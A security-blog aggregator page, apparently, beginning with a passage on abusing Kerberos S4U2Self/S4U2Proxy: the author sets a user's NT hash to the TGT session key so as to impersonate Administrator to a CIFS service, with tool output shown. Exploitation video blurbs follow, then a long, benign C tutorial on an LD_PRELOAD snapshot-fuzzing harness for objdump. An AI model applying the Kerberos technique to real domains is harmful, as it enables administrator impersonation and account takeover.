    [*] Sending S4U2proxy request to domain controller 10.0.0.10:88
    [X] KRB-ERROR (13) : KDC_ERR_BADOPTION

    Okay, we're getting closer. The S4U2Self request was successful, unfortunately the S4U2Proxy request was not, failing with a KDC_ERR_BADOPTION error. After a bit of playing around this is almost certainly because the KDC can't decrypt the ticket sent in the S4U2Proxy request. It'll try the user's long term key, but that will obviously fail. I tried to see if I could send the user's TGT with the request (in addition to the S4U2Self service ticket) but it still failed. Is this not going to be possible?

    Thinking about this a bit more, I wondered, could I decrypt the S4U2Self ticket and then re-encrypt it with the long term key I already know for the user? Technically speaking this would create a valid Kerberos ticket, however it wouldn't create a valid PAC. This is because the PAC contains a Server Signature which is a HMAC of the PAC using the key used to encrypt the ticket. The KDC checks this to ensure the PAC hasn't been modified or put into a new ticket, and if it's incorrect it'll fail the request.

    As we know the key, we could just update this value. However, the Server Signature is protected by the KDC Signature which is a HMAC keyed with the KDC's own key. We don't know this key and so we can't update this second signature to match the modified Server Signature. Looks like we're stuck.

    Still, what would happen if the user's long term key happened to match the TGT session key we used to encrypt the S4U2Self ticket? It's pretty unlikely to happen by chance, but with knowledge of the user's password we could conceivably change the user's password on the DC between the S4U2Self and the S4U2Proxy requests so that when submitting the ticket the KDC can decrypt it and perhaps we can successfully get the delegated ticket.

    As we know the TGT's session key, one obvious approach would be to "crack" the hash value back to a valid Unicode password. For AES keys I think this is going to be difficult and even if successful could be time consuming. However, RC4 keys are just a MD4 hash with no additional protection against brute force cracking. Fortunately the code in Rubeus defaults to requesting an RC4 session key for the TGT, and MS have yet to disable RC4 by default in Windows domains. This seems like it might be doable, even if it takes a long time. We would also need the "cracked" password to be valid per the domain's password policy which adds extra complications.

    However, I recalled when playing with the SAM RPC APIs that there is a SamrChangePasswordUser method which will change a user's password to an arbitrary NT hash. The only requirement is knowledge of the existing NT hash and we can set any new NT hash we like. This doesn't need to honor the password policy, except for the minimum age setting. We don't even need to deal with how to call the RPC API correctly as the SAM DLL exports the SamiChangePasswordUser API which does all the hard work. 

    I took some example C# code written by Vincent Le Toux and plugged that into Rubeus at the correct point, passing the current TGT's session key as the new NT hash. Let's see if it works:

    SamConnect OK
    SamrOpenDomain OK
    rid is 1208
    SamOpenUser OK
    SamiChangePasswordUser OK

    [*] Impersonating user 'Administrator' to target SPN 'cifs/WIN10TEST.domain.local'
    [*] Building S4U2proxy request for service: 'cifs/WIN10TEST.domain.local'
    [*] Using domain controller: primarydc.domain.local (10.0.0.10)
    [*] Sending S4U2proxy request to domain controller 10.0.0.10:88
    [+] S4U2proxy success!
    [*] base64(ticket.kirbi) for SPN 'cifs/WIN10TEST.domain.local':
          doIG3...

    And it does! Now the caveats:

    • This will obviously only work if RC4 is still enabled on the domain. 
    • You will need the user's password or NT hash. I couldn't think of a way of doing this with only a valid TGT.
    • The user is sacrificial; it might be hard to log in using a password afterwards. If you can't immediately reset the password due to the domain's policy, the user might be completely broken. 
    • It's not very silent, but that's not my problem.
    • You're probably better off just doing the shadow credentials attack, if PKINIT is enabled.
    As I'm feeling lazy I'm not going to provide the changes to Rubeus. Except for the call to SamiChangePasswordUser all the code is already there to perform the attack; it just needs to be wired up. I'm sure they'd welcome the addition.

    [Video] Introduction to Use-After-Free Vulnerabilities | UserAfterFree Challenge Walkthrough (Part: 1)

    3 May 2022 at 01:22

    An introduction to Use-After-Free exploitation and walking through one of my old challenges. Challenge Info: https://www.malwaretech.com/challenges/windows-exploitation/user-after-free-1-0 Download Link: https://malwaretech.com/downloads/challenges/UserAfterFree2.0.rar Password: MalwareTech

    The post [Video] Introduction to Use-After-Free Vulnerabilities | UserAfterFree Challenge Walkthrough (Part: 1) appeared first on MalwareTech.

    [Video] Exploiting Windows RPC – CVE-2022-26809 Explained | Patch Analysis

    23 April 2022 at 21:13

    Walking through my process of how I use patch analysis and reverse engineering to find vulnerabilities, then evaluate the risk and exploitability of bugs.

    The post [Video] Exploiting Windows RPC – CVE-2022-26809 Explained | Patch Analysis appeared first on MalwareTech.

    Fuzzing Like A Caveman 6: Binary Only Snapshot Fuzzing Harness

    2 April 2022 at 04:00
    By: h0mbre

    Introduction

    It’s been a while since I’ve done one of these, and one of my goals this year is to do more so here we are. A side project of mine is kind of reaching a good stopping point so I’ll have more free-time to do my own research and blog again. Looking forward to sharing more and more this year.

    One of the most common questions that comes up in beginner fuzzing circles (of which I'm obviously a member) is how to harness a target so that it can be fuzzed in memory, in what some would call 'persistent' fashion, in order to gain performance. Persistent fuzzing has a niche use-case where the target doesn't touch much global state from fuzzcase to fuzzcase; an example would be a tight fuzzing loop for a single API in a library, or maybe a single function in a binary.

    This style of fuzzing is faster than re-executing the target from scratch over and over as we bypass all the heavy syscalls/kernel routines associated with creating and destroying task structs.
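    The shape of such a loop can be sketched in a few lines of C. This is not from the original post; parse_input() is a hypothetical stand-in for the API under test and the "mutator" is deliberately trivial, just to show the in-process call-the-target-repeatedly structure:

    ```c
    #include <stdint.h>
    #include <stdio.h>
    #include <string.h>

    /* Hypothetical stand-in for the API under test */
    static int parse_input(const uint8_t *buf, size_t len) {
        /* Pretend inputs starting with 'A' are "interesting" */
        return (len > 0 && buf[0] == 'A') ? 1 : 0;
    }

    /* Trivial deterministic "mutator" for demonstration only */
    static void mutate(uint8_t *buf, size_t len, unsigned iter) {
        memset(buf, 'A' + (iter % 26), len);
    }

    int main(void) {
        uint8_t input[16];
        unsigned hits = 0;

        /* Persistent loop: call the target in-process, no fork/exec per case */
        for (unsigned iter = 0; iter < 26; iter++) {
            mutate(input, sizeof(input), iter);
            hits += parse_input(input, sizeof(input));
        }

        printf("interesting cases: %u\n", hits);
        return 0;
    }
    ```

    A fresh run prints "interesting cases: 1". The whole point is that the for loop replaces 26 separate process creations, which is where the speedup comes from.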

    However, with binary targets for which we don't have source code, it's sometimes hard to discern what global state we're affecting while executing any code path without some heavy reverse engineering (disgusting, work? gross). Additionally, we often want to fuzz a wider loop. It doesn't do us much good to fuzz a function which returns a struct that is then never read or consumed in our fuzzing workflow. With these things in mind, we often find that 'snapshot' fuzzing would be a more robust workflow for binary targets, or even production binaries for which we have source but which have gone through the sausage factory of enterprise build systems.

    So today, we’re going to learn how to take an arbitrary binary only target that takes an input file from the user and turn it into a target that takes its input from memory instead and lends itself well to having its state reset between fuzzcases.

    Target (Easy Mode)

    For the purposes of this blogpost, we’re going to harness objdump to be snapshot fuzzed. This will serve our purposes because it’s relatively simple (single threaded, single process) and it’s a common fuzzing target, especially as people do development work on their fuzzers. The point of this is not to impress you by sandboxing some insane target like Chrome, but to show beginners how to start thinking about harnessing. You want to lobotomize your targets so that they are unrecognizable to their original selves but retain the same semantics. You can get as creative as you want, and honestly, sometimes harnessing targets is some of the most satisfying work related to fuzzing. It feels great to successfully sandbox a target and have it play nice with your fuzzer. On to it then.

    Hello World

    The first step is to determine how we want to change objdump’s behavior. Let’s try running it under strace and disassemble ls and see how it behaves at the syscall level with strace objdump -D /bin/ls. What we’re looking for is the point where objdump starts interacting with our input, /bin/ls in this case. In the output, if you scroll down past the boilerplate stuff, you can see the first appearance of /bin/ls:

    stat("/bin/ls", {st_mode=S_IFREG|0755, st_size=133792, ...}) = 0
    stat("/bin/ls", {st_mode=S_IFREG|0755, st_size=133792, ...}) = 0
    openat(AT_FDCWD, "/bin/ls", O_RDONLY)   = 3
    fcntl(3, F_GETFD)                       = 0
    fcntl(3, F_SETFD, FD_CLOEXEC)           = 0
    

    Keep in mind that as you read through this, if you're following along at home, your output might not match mine exactly. I'm likely on a different distribution than you, running a different objdump than you. But the point of the blogpost is just to show concepts that you can get creative with on your own.

    I also noticed that the program doesn’t close our input file until the end of execution:

    read(3, "\0\0\0\0\0\0\0\0\10\0\"\0\0\0\0\0\1\0\0\0\377\377\377\377\1\0\0\0\0\0\0\0"..., 4096) = 2720
    write(1, ":(%rax)\n  21ffa4:\t00 00         "..., 4096) = 4096
    write(1, "x0,%eax\n  220105:\t00 00         "..., 4096) = 4096
    close(3)                                = 0
    write(1, "023e:\t00 00                \tadd "..., 2190) = 2190
    exit_group(0)                           = ?
    +++ exited with 0 +++
    

    This is good to know, we’ll need our harness to be able to emulate an input file fairly well since objdump doesn’t just read our file into a memory buffer in one shot or mmap() the input file. It is continuously reading from the file throughout the strace output.

    Since we don’t have source code for the target, we’re going to affect behavior by using an LD_PRELOAD shared object. By using an LD_PRELOAD shared object, we should be able to hook the wrapper functions around the syscalls that interact with our input file and change their behavior to suit our purposes. If you are unfamiliar with dynamic linking or LD_PRELOAD, this would be a good stopping point to go Google around for more information great starting point. For starters, let’s just get a Hello, World! shared object loaded.

    We can utilize gcc Function Attributes to have our shared object execute code when it is loaded by the target by leveraging the constructor attribute.

    So our code so far will look like this:

    /* 
    Compiler flags: 
    gcc -shared -Wall -Werror -fPIC blog_harness.c -o blog_harness.so -ldl
    */
    
    #include <stdio.h> /* printf */
    
    // Routine to be called when our shared object is loaded
    __attribute__((constructor)) static void _hook_load(void) {
        printf("** LD_PRELOAD shared object loaded!\n");
    }
    

    I added the compiler flags needed to compile to the top of the file as a comment. I got these flags from this blogpost on using LD_PRELOAD shared objects a while ago: https://tbrindus.ca/correct-ld-preload-hooking-libc/.

    We can now use the LD_PRELOAD environment variable and run objdump with our shared object which should print when loaded:

    [email protected]:~/blogpost$ LD_PRELOAD=/home/h0mbre/blogpost/blog_harness.so objdump -D /bin/ls > /tmp/output.txt && head -n 20 /tmp/output.txt
    ** LD_PRELOAD shared object loaded!
    
    /bin/ls:     file format elf64-x86-64
    
    
    Disassembly of section .interp:
    
    0000000000000238 <.interp>:
     238:   2f                      (bad)  
     239:   6c                      ins    BYTE PTR es:[rdi],dx
     23a:   69 62 36 34 2f 6c 64    imul   esp,DWORD PTR [rdx+0x36],0x646c2f34
     241:   2d 6c 69 6e 75          sub    eax,0x756e696c
     246:   78 2d                   js     275 <[email protected]@Base-0x34e3>
     248:   78 38                   js     282 <[email protected]@Base-0x34d6>
     24a:   36 2d 36 34 2e 73       ss sub eax,0x732e3436
     250:   6f                      outs   dx,DWORD PTR ds:[rsi]
     251:   2e 32 00                xor    al,BYTE PTR cs:[rax]
    
    Disassembly of section .note.ABI-tag:
    

    It works, now we can start looking for functions to hook.

    Looking for Hooks

    First thing we need to do is create a fake file name to give objdump so that we can start testing things out. We will copy /bin/ls into the current working directory and call it fuzzme. This will allow us to generically play around with the harness for testing purposes. From our strace output, we know that objdump calls stat() on the path for our input file (/bin/ls) a couple of times before we get that call to openat(). Since we know our file hasn't been opened yet, and the syscall uses the path for the first arg, we can guess that this syscall results from the libc exported wrapper function for stat() or lstat(). I'm going to assume stat() since we aren't dealing with any symbolic links for /bin/ls on my box. We can add a hook for stat() to see if we hit it and check if it's being called for our target input file (now changed to fuzzme).

    In order to create a hook, we will follow a pattern where we define a pointer to the real function via a typedef and then we will initialize the pointer as NULL. Once we need to resolve the location of the real function we are hooking, we can use dlsym(RTLD_NEXT, <symbol name>) to get its location and change the pointer value to the real symbol address. (This will be more clear later on).
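    As a minimal, self-contained illustration of that pattern (my own example, not from the post, using libc's puts() as a stand-in for the symbol we'll eventually hook), the resolve-on-first-use shape looks like this:

    ```c
    #define _GNU_SOURCE /* RTLD_NEXT */
    #include <stdio.h>
    #include <dlfcn.h>

    /* Typedef matching the real function's prototype; pointer starts NULL */
    typedef int (*puts_t)(const char *s);
    static puts_t real_puts = NULL;

    int call_via_next(const char *s) {
        /* Resolve the *next* definition of the symbol on first use only */
        if (NULL == real_puts) {
            real_puts = (puts_t)dlsym(RTLD_NEXT, "puts");
        }
        return real_puts(s);
    }

    int main(void) {
        call_via_next("resolved puts via RTLD_NEXT");
        return 0;
    }
    ```

    Compile with -ldl on older glibc (2.34+ folds dlsym into libc). In a real LD_PRELOAD hook the function would be named puts() itself, so callers hit our version first and we forward to the real one.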

    Now we need to hook stat() which appears as a man 3 entry here (meaning it’s a libc exported function) as well as a man 2 entry (meaning it is a syscall). This was confusing to me for the longest time and I often misunderstood how syscalls actually worked because of this insistence on naming collisions. You can read one of the first research blogposts I ever did here where the confusion is palpable and I often make erroneous claims. (PS, I’ll never edit the old blogposts with errors in them, they are like time capsules, and it’s kind of cool to me).

    We want to write a function that when called, simply prints something and exits so that we know our hook was hit. For now, our code looks like this:

    /* 
    Compiler flags: 
    gcc -shared -Wall -Werror -fPIC blog_harness.c -o blog_harness.so -ldl
    */
    
    #include <stdio.h> /* printf */
    #include <sys/stat.h> /* stat */
    #include <stdlib.h> /* exit */
    
    // Filename of the input file we're trying to emulate
    #define FUZZ_TARGET "fuzzme"
    
    // Declare a prototype for the real stat as a function pointer
    typedef int (*stat_t)(const char *restrict path, struct stat *restrict buf);
    stat_t real_stat = NULL;
    
    // Hook function, objdump will call this stat instead of the real one
    int stat(const char *restrict path, struct stat *restrict buf) {
        printf("** stat() hook!\n");
        exit(0);
    }
    
    // Routine to be called when our shared object is loaded
    __attribute__((constructor)) static void _hook_load(void) {
        printf("** LD_PRELOAD shared object loaded!\n");
    }
    

    However, if we compile and run that, we don't ever print and exit, so our hook is not being called. Something is going wrong. Sometimes file-related functions in libc have 64 variants, such as open() and open64(), that are used somewhat interchangeably depending on configurations and flags. I tried hooking stat64() but still had no luck with the hook being reached.

    Luckily, I’m not the first person with this problem, there is a great answer on Stackoverflow about the very issue that describes how libc doesn’t actually export stat() the same way it does for other functions like open() and open64(), instead it exports a symbol called __xstat() which has a slightly different signature and requires a new argument called version which is meant to describe which version of stat struct the caller is expecting. This is supposed to all happen magically under the hood but that’s where we live now, so we have to make the magic happen ourselves. The same rules apply for lstat() and fstat() as well, they have __lxstat() and __fxstat() respectively.

    I found the definitions for the functions here. So we can add the __xstat() hook to our shared object in place of the stat() and see if our luck changes. Our code now looks like this:

    /* 
    Compiler flags: 
    gcc -shared -Wall -Werror -fPIC blog_harness.c -o blog_harness.so -ldl
    */
    
    #include <stdio.h> /* printf */
    #include <sys/stat.h> /* stat */
    #include <stdlib.h> /* exit */
    #include <unistd.h> /* __xstat, __fxstat */
    
    // Filename of the input file we're trying to emulate
    #define FUZZ_TARGET "fuzzme"
    
    // Declare a prototype for the real stat as a function pointer
    typedef int (*__xstat_t)(int __ver, const char *__filename, struct stat *__stat_buf);
    __xstat_t real_xstat = NULL;
    
    // Hook function, objdump will call this stat instead of the real one
    int __xstat(int __ver, const char *__filename, struct stat *__stat_buf) {
        printf("** Hit our __xstat() hook!\n");
        exit(0);
    }
    
    // Routine to be called when our shared object is loaded
    __attribute__((constructor)) static void _hook_load(void) {
        printf("** LD_PRELOAD shared object loaded!\n");
    }
    

    Now if we run our shared object, we get the desired outcome, somewhere, our hook is hit. Now we can help ourselves out a bit and print the filenames being requested by the hook and then actually call the real __xstat() on behalf of the caller. Now when our hook is hit, we will have to resolve the location of the real __xstat() by name, so we’ll add a symbol resolving function to our shared object. Our shared object code now looks like this:

    /* 
    Compiler flags: 
    gcc -shared -Wall -Werror -fPIC blog_harness.c -o blog_harness.so -ldl
    */
    
    #define _GNU_SOURCE     /* dlsym */
    #include <stdio.h> /* printf */
    #include <sys/stat.h> /* stat */
    #include <stdlib.h> /* exit */
    #include <unistd.h> /* __xstat, __fxstat */
    #include <dlfcn.h> /* dlsym and friends */
    
    // Filename of the input file we're trying to emulate
    #define FUZZ_TARGET "fuzzme"
    
    // Declare a prototype for the real stat as a function pointer
    typedef int (*__xstat_t)(int __ver, const char *__filename, struct stat *__stat_buf);
    __xstat_t real_xstat = NULL;
    
    // Returns memory address of *next* location of symbol in library search order
    static void *_resolve_symbol(const char *symbol) {
        // Clear previous errors
        dlerror();
    
        // Get symbol address
        void* addr = dlsym(RTLD_NEXT, symbol);
    
        // Check for error
        char* err = NULL;
        err = dlerror();
        if (err) {
            addr = NULL;
            printf("Err resolving '%s' addr: %s\n", symbol, err);
            exit(-1);
        }
        
        return addr;
    }
    
    // Hook function, objdump will call this stat instead of the real one
    int __xstat(int __ver, const char *__filename, struct stat *__stat_buf) {
        // Print the filename requested
        printf("** __xstat() hook called for filename: '%s'\n", __filename);
    
        // Resolve the address of the real __xstat() on demand and only once
        if (!real_xstat) {
            real_xstat = _resolve_symbol("__xstat");
        }
    
        // Call the real __xstat() for the caller so everything keeps going
        return real_xstat(__ver, __filename, __stat_buf);
    }
    
    // Routine to be called when our shared object is loaded
    __attribute__((constructor)) static void _hook_load(void) {
        printf("** LD_PRELOAD shared object loaded!\n");
    }
    

    Ok so now when we run this, and we check for our print statements, things get a little spicy.

    [email protected]:~/blogpost$ LD_PRELOAD=/home/h0mbre/blogpost/blog_harness.so objdump -D fuzzme > /tmp/output.txt && grep "** __xstat" /tmp/output.txt
    ** __xstat() hook called for filename: 'fuzzme'
    ** __xstat() hook called for filename: 'fuzzme'
    

    So now we can have some fun.

    __xstat() Hook

    So the purpose of this hook will be to lie to objdump and make it think it successfully stat()'ed the input file. Remember, we're making a snapshot fuzzing harness, so our objective is to constantly be creating new inputs and feeding them to objdump through this harness. Most importantly, our harness will need to be able to represent our variable length inputs (which will be stored purely in memory) as files. Each fuzzcase the file length can change, and our harness needs to accommodate that.

    My idea at this point was to create a somewhat “legit” stat struct that would normally be returned for our actual file fuzzme which is just a copy of /bin/ls. We can store this stat struct globally and only update the size field as each new fuzz case comes through. So the timeline of our snapshot fuzzing workflow would look something like:

    1. Our constructor function is called when our shared object is loaded
    2. Our constructor sets up a global “legit” stat struct that we can update for each fuzzcase and pass back to callers of __xstat() trying to stat() our fuzzing target
    3. The imaginary fuzzer runs objdump to the snapshot location
    4. Our __xstat() hook updates the global "legit" stat struct's size field and copies the stat struct into the caller's buffer
    5. The imaginary fuzzer restores the state of objdump to its state at snapshot time
    6. The imaginary fuzzer copies a new input into harness and updates the input size
    7. Our __xstat() hook is called once again, and we repeat step 4; this process repeats over and over forever

    So we’re imagining the fuzzer has some routine like this in pseudocode, even though it’d likely be cross-process and require process_vm_writev:

    insert_fuzzcase(config.input_location, config.input_size_location, input, input_size) {
      memcpy(config.input_location, &input, input_size);
      memcpy(config.input_size_location, &input_size, sizeof(size_t));
    }
    

    One important thing to keep in mind is that if the snapshot fuzzer is restoring objdump to its snapshot state every fuzzing iteration, we must be careful not to depend on any global mutable memory. The global stat struct will be safe since it will be instantiated during the constructor however, its size-field will be restored to its original value each fuzzing iteration by the fuzzer’s snapshot restore routine.
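    To see why this matters, here's a toy example (mine, not from the post) of state leaking across in-process iterations, which is exactly what a snapshot restore undoes each fuzzcase:

    ```c
    #include <stdio.h>

    /* Global mutable state: survives across in-process calls */
    static int call_count = 0;

    /* Toy target whose result depends on how many times it has run */
    int target(int x) {
        call_count++; /* state leaks from fuzzcase to fuzzcase */
        return x + call_count;
    }

    int main(void) {
        /* Same input, different result on the second in-memory iteration */
        int a = target(5);
        int b = target(5);
        printf("%d %d\n", a, b);
        return 0;
    }
    ```

    On a fresh run this prints "6 7": identical inputs diverge because of the counter. A snapshot fuzzer restoring memory to the snapshot state each iteration would reset call_count and make runs reproducible, which is why our harness parks its deliberately mutable data (input bytes, input size) in dedicated ranges the fuzzer is told to skip during restoration.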

    We will also need a global, recognizable address to store variable mutable global data like the current input’s size. Several snapshot fuzzers have the flexibility to ignore contiguous ranges of memory for restoration purposes. So if we’re able to create some contiguous buffers in memory at recognizable addresses, we can have our imaginary fuzzer ignore those ranges for snapshot restorations. So we need to have a place to store the inputs, as well as information about their size. We would then somehow tell the fuzzer about these locations and when it generated a new input, it would copy it into the input location and then update the current input size information.

    So now our constructor has an additional job: setup the input location as well as the input size information. We can do this easily with a call to mmap() which will allow us to specify an address we want our mapping mapped to with the MAP_FIXED flag. We’ll also create a MAX_INPUT_SZ definition so that we know how much memory to map from the input location.

    Just by themselves, the functions related to mapping memory space for the inputs themselves and their size information looks like this. Notice that we use MAP_FIXED and we check the returned address from mmap() just to make sure the call didn’t succeed but map our memory at a different location:

    // Map memory to hold our inputs in memory and information about their size
    static void _create_mem_mappings(void) {
        void *result = NULL;
    
        // Map the page to hold the input size
        result = mmap(
            (void *)(INPUT_SZ_ADDR),
            sizeof(size_t),
            PROT_READ | PROT_WRITE,
            MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED,
            0,
            0
        );
        if ((MAP_FAILED == result) || (result != (void *)INPUT_SZ_ADDR)) {
            printf("Err mapping INPUT_SZ_ADDR, mapped @ %p\n", result);
            exit(-1);
        }
    
        // Let's actually initialize the value at the input size location as well
        *(size_t *)INPUT_SZ_ADDR = 0;
    
        // Map the pages to hold the input contents
        result = mmap(
            (void *)(INPUT_ADDR),
            (size_t)(MAX_INPUT_SZ),
            PROT_READ | PROT_WRITE,
            MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED,
            0,
            0
        );
        if ((MAP_FAILED == result) || (result != (void *)INPUT_ADDR)) {
            printf("Err mapping INPUT_ADDR, mapped @ %p\n", result);
            exit(-1);
        }
    
        // Init the value
        memset((void *)INPUT_ADDR, 0, (size_t)MAX_INPUT_SZ);
    }
    

    mmap() will actually map multiples of whatever the page size is on your system (typically 4096 bytes). So, when we ask for sizeof(size_t) bytes for the mapping, mmap() is like: “Hmm, that’s just a page dude” and gives us back a whole page from 0x1336000 - 0x1337000 not inclusive on the high-end.
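    You can verify that page-granularity behavior with a quick standalone test (my own sketch, not part of the harness): ask mmap() for only sizeof(size_t) bytes, then touch the last byte of the page it handed back.

    ```c
    #include <stdio.h>
    #include <sys/mman.h>
    #include <unistd.h>

    int main(void) {
        long page = sysconf(_SC_PAGESIZE);

        /* Ask for only 8 bytes... */
        unsigned char *p = mmap(NULL, sizeof(size_t),
                                PROT_READ | PROT_WRITE,
                                MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
        if (MAP_FAILED == p) {
            perror("mmap");
            return 1;
        }

        /* ...but the kernel backs the mapping with a whole page */
        p[page - 1] = 0x41;
        printf("page size %ld, last byte in page: 0x%02x\n", page, p[page - 1]);

        munmap(p, sizeof(size_t));
        return 0;
    }
    ```

    The write at p[page - 1] is far past the 8 bytes we requested but still lands inside the page mmap() allocated, which is the "that's just a page dude" behavior described above.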

    Random sidenote: be careful about arithmetic in definitions and macros, as I've done here with MAX_INPUT_SZ; it's very easy for the pre-processor to substitute your text for the definition keyword and ruin some order of operations or even overflow a specific primitive type like int.
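    A concrete instance of that order-of-operations footgun (a contrived example of mine, not from the harness code):

    ```c
    #include <stdio.h>

    /* Unparenthesized arithmetic in a definition... */
    #define BAD_SZ  1024 + 1024
    /* ...versus the safe, parenthesized version */
    #define GOOD_SZ (1024 + 1024)

    int main(void) {
        /* Text substitution yields 2 * 1024 + 1024 = 3072, not 4096 */
        printf("2 * BAD_SZ  = %d\n", 2 * BAD_SZ);
        printf("2 * GOOD_SZ = %d\n", 2 * GOOD_SZ);
        return 0;
    }
    ```

    This is why the harness defines MAX_INPUT_SZ as (1024 * 1024), with the parentheses.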

    Now that we have memory set up for the fuzzer to store inputs and information about the input's size, we can create that global stat struct. But we actually have a big problem. How can we call into __xstat() to get our "legit" stat struct if we have __xstat() hooked? We would hit our own hook. To circumvent this, we can call __xstat() with a special __ver argument that we know will mean it was called from our constructor; the variable is an int so let's go with 0x1337 as the special value. That way, in our hook, if we check __ver and it's 0x1337, we know we are being called from the constructor and we can actually stat our real file and create a global "legit" stat struct. When I dumped a normal call to __xstat() by objdump, __ver was always a value of 1, so we will patch it back to that inside our hook. Now our entire shared object source file should look like this:

    /* 
    Compiler flags: 
    gcc -shared -Wall -Werror -fPIC blog_harness.c -o blog_harness.so -ldl
    */
    
    #define _GNU_SOURCE     /* dlsym */
    #include <stdio.h> /* printf */
    #include <sys/stat.h> /* stat */
    #include <stdlib.h> /* exit */
    #include <unistd.h> /* __xstat, __fxstat */
    #include <dlfcn.h> /* dlsym and friends */
    #include <sys/mman.h> /* mmap */
    #include <string.h> /* memset */
    
    // Filename of the input file we're trying to emulate
    #define FUZZ_TARGET "fuzzme"
    
    // Definitions for our in-memory inputs 
    #define INPUT_SZ_ADDR   0x1336000
    #define INPUT_ADDR      0x1337000
    #define MAX_INPUT_SZ    (1024 * 1024)
    
    // Our "legit" global stat struct
    struct stat st;
    
    // Declare a prototype for the real stat as a function pointer
    typedef int (*__xstat_t)(int __ver, const char *__filename, struct stat *__stat_buf);
    __xstat_t real_xstat = NULL;
    
    // Returns memory address of *next* location of symbol in library search order
    static void *_resolve_symbol(const char *symbol) {
        // Clear previous errors
        dlerror();
    
        // Get symbol address
        void* addr = dlsym(RTLD_NEXT, symbol);
    
        // Check for error
        char* err = NULL;
        err = dlerror();
        if (err) {
            addr = NULL;
            printf("Err resolving '%s' addr: %s\n", symbol, err);
            exit(-1);
        }
        
        return addr;
    }
    
    // Hook for __xstat 
    int __xstat(int __ver, const char* __filename, struct stat* __stat_buf) {
        // Resolve the real __xstat() on demand and maybe multiple times!
        if (NULL == real_xstat) {
            real_xstat = _resolve_symbol("__xstat");
        }
    
        // Assume the worst, always
        int ret = -1;
    
        // Special __ver value check to see if we're calling from constructor
        if (0x1337 == __ver) {
            // Patch back up the version value before sending to real xstat
            __ver = 1;
    
            ret = real_xstat(__ver, __filename, __stat_buf);
    
            // Set the real_xstat back to NULL
            real_xstat = NULL;
            return ret;
        }
    
        // Determine if we're stat'ing our fuzzing target
        if (!strcmp(__filename, FUZZ_TARGET)) {
            // Update our global stat struct
            st.st_size = *(size_t *)INPUT_SZ_ADDR;
    
            // Send it back to the caller, skip syscall
            memcpy(__stat_buf, &st, sizeof(struct stat));
            ret = 0;
        }
    
        // Just a normal stat, send to real xstat
        else {
            ret = real_xstat(__ver, __filename, __stat_buf);
        }
    
        return ret;
    }
    
    // Map memory to hold our inputs in memory and information about their size
    static void _create_mem_mappings(void) {
        void *result = NULL;
    
        // Map the page to hold the input size
        result = mmap(
            (void *)(INPUT_SZ_ADDR),
            sizeof(size_t),
            PROT_READ | PROT_WRITE,
            MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED,
            0,
            0
        );
        if ((MAP_FAILED == result) || (result != (void *)INPUT_SZ_ADDR)) {
            printf("Err mapping INPUT_SZ_ADDR, mapped @ %p\n", result);
            exit(-1);
        }
    
        // Let's actually initialize the value at the input size location as well
        *(size_t *)INPUT_SZ_ADDR = 0;
    
        // Map the pages to hold the input contents
        result = mmap(
            (void *)(INPUT_ADDR),
            (size_t)(MAX_INPUT_SZ),
            PROT_READ | PROT_WRITE,
            MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED,
            0,
            0
        );
        if ((MAP_FAILED == result) || (result != (void *)INPUT_ADDR)) {
            printf("Err mapping INPUT_ADDR, mapped @ %p\n", result);
            exit(-1);
        }
    
        // Init the value
        memset((void *)INPUT_ADDR, 0, (size_t)MAX_INPUT_SZ);
    }
    
    // Routine to be called when our shared object is loaded
    __attribute__((constructor)) static void _hook_load(void) {
        // Create memory mappings to hold our input and information about its size
        _create_mem_mappings();    
    }
    

    Now if we run this, we get the following output:

    h0mbre@ubuntu:~/blogpost$ LD_PRELOAD=/home/h0mbre/blogpost/blog_harness.so objdump -D fuzzme
    objdump: Warning: 'fuzzme' is not an ordinary file
    

    This is cool: it means the objdump devs did something right. Their stat() check would say: “Hey, this file is zero bytes in length, something weird is going on,” spit out this error message, and exit. Good job devs!

    So we have identified a problem: we need to simulate the fuzzer placing a real input into memory. To do that, I’m going to start using #ifdef to define whether or not we’re testing our shared object. Basically, if we compile the shared object with TEST defined, it will copy an “input” into memory to simulate how the fuzzer would behave during fuzzing, and we can see if our harness is working appropriately. So if we define TEST, we will place the /bin/ed bytes into our input buffer and update our global “legit” stat struct’s size member.

    You can compile the shared object now to perform the test as follows:

    gcc -D TEST -shared -Wall -Werror -fPIC blog_harness.c -o blog_harness.so -ldl
    

    We also need to set up our global “legit” stat struct; the code to do that should look as follows. Remember, we pass a fake __ver value to let the __xstat() hook know that it’s us calling from the constructor routine, which allows the hook to behave well and give us the stat struct we need:

    // Create a "legit" stat struct globally to pass to callers
    static void _setup_stat_struct(void) {
        // Create a global stat struct for our file in case someone asks, this way
        // when someone calls stat() or fstat() on our target, we can just return the
        // slightly altered (new size) stat struct &skip the kernel, save syscalls
        int result = __xstat(0x1337, FUZZ_TARGET, &st);
        if (-1 == result) {
            printf("Error creating stat struct for '%s' during load\n", FUZZ_TARGET);
        }
    }
    

    All in all, our entire harness looks like this now:

    /* 
    Compiler flags: 
    gcc -shared -Wall -Werror -fPIC blog_harness.c -o blog_harness.so -ldl
    */
    
    #define _GNU_SOURCE     /* dlsym */
    #include <stdio.h> /* printf */
    #include <sys/stat.h> /* stat */
    #include <stdlib.h> /* exit */
    #include <unistd.h> /* __xstat, __fxstat */
    #include <dlfcn.h> /* dlsym and friends */
    #include <sys/mman.h> /* mmap */
    #include <string.h> /* memset */
    #include <fcntl.h> /* open */
    
    // Filename of the input file we're trying to emulate
    #define FUZZ_TARGET     "fuzzme"
    
    // Definitions for our in-memory inputs 
    #define INPUT_SZ_ADDR   0x1336000
    #define INPUT_ADDR      0x1337000
    #define MAX_INPUT_SZ    (1024 * 1024)
    
    // For testing purposes, we read /bin/ed into our input buffer to simulate
    // what the fuzzer would do
    #define  TEST_FILE      "/bin/ed"
    
    // Our "legit" global stat struct
    struct stat st;
    
    // Declare a prototype for the real stat as a function pointer
    typedef int (*__xstat_t)(int __ver, const char *__filename, struct stat *__stat_buf);
    __xstat_t real_xstat = NULL;
    
    // Returns memory address of *next* location of symbol in library search order
    static void *_resolve_symbol(const char *symbol) {
        // Clear previous errors
        dlerror();
    
        // Get symbol address
        void* addr = dlsym(RTLD_NEXT, symbol);
    
        // Check for error
        char* err = NULL;
        err = dlerror();
        if (err) {
            addr = NULL;
            printf("Err resolving '%s' addr: %s\n", symbol, err);
            exit(-1);
        }
        
        return addr;
    }
    
    // Hook for __xstat 
